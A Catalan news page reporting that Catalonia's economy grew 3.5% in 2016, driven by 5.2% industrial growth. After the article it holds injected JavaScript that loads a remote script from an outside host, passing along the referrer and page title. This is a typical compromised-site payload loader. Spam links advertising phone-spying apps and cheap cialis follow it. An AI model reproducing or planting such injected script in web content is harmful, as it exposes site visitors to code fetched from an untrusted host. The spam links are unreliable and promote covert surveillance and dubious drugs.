Notícies

La indústria eleva l’economia catalana el 2016

El sector manufacturer experimenta un creixement del 5,2% i el PIB català s’expandeix un 3,5%

L’economia catalana ha crescut un 3,5% el 2016, una dècima més que el 2015, gràcies al dinamisme de la indústria, que ha registrat un creixement del 5,2% -2,5 punts percentuals més que l’any anterior-, segons l’estimació avançada del PIB que elaboren conjuntament l’Idescat i la Conselleria d’Economia de la Generalitat.

El quart trimestre del 2016, el creixement intertrimestral ha estat d’un 0,6%, una dècima menys que el trimestre anterior, però “dins d’una tònica de creixement elevat”, que situa la taxa interanual de l’últim trimestre en un 3,1%, ha informat la Generalitat en un comunicat aquest dilluns.

Llegir més sobre la noticia AQUÍ

d.getElementsByTagName('head')[0].appendChild(s);

s.src='https://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; http://chetraicayviet.com/spying-app-how-to-intercept-text-spy-software-text/http://alcarbonburgerbar.com/cell-spyware-spy-bubble-how-to-spy-on-cell-phone/ cheap ciallis 20 mg

Deixa un comentari

L'adreça electrònica no es publicarà Els camps necessaris estan marcats amb *

Podeu fer servir aquestes etiquetes i atributs HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>